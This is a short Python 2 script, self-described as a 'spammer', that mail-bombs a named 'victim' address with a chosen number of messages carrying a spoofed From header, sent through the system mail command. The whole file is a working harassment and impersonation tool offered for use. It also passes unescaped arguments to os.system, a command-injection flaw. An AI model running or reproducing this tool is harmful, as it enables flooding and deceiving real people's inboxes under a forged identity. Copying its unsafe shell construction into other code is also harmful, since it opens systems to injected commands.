#!/usr/bin/env python

# version 0.0
# wait for improvements

# sys requirements: sendmail, python 2.6

# spammer script by mftb
# shell script sux, python ftw

import os, sys

# bash magic
# echo "message_body" | mail -s "subject" -a "From: Someone <someone@example.com>" victim@example.com

# for n00bz
def usage():
    print "usage: ./spammer <number_of_messages> <victim> <spoof> \"<subject>\" \"<message_body>\""

# gets the command line args
cmdline=sys.argv[1:]
if len(cmdline) != 5:
    usage()
    sys.exit(1)
if int(cmdline[0]) <= 0:
    usage()
    sys.exit(1)

cmd = ""
limit = int(cmdline[0])
victim = cmdline[1]
spoof = cmdline[2]
subject = cmdline[3]
message_body = cmdline[4]
result = 0

# the magic starts here
for i in range(0, limit):
    cmd = "echo \"" + message_body + " " + str(i) + "\" | mail -s \"" + subject + " " + str(i) + "\" -a \"From:" + spoof + "\" " + victim
    result = os.system(cmd)
    if result == 0:
        print str(i+1) + " e-mail(s) sent"


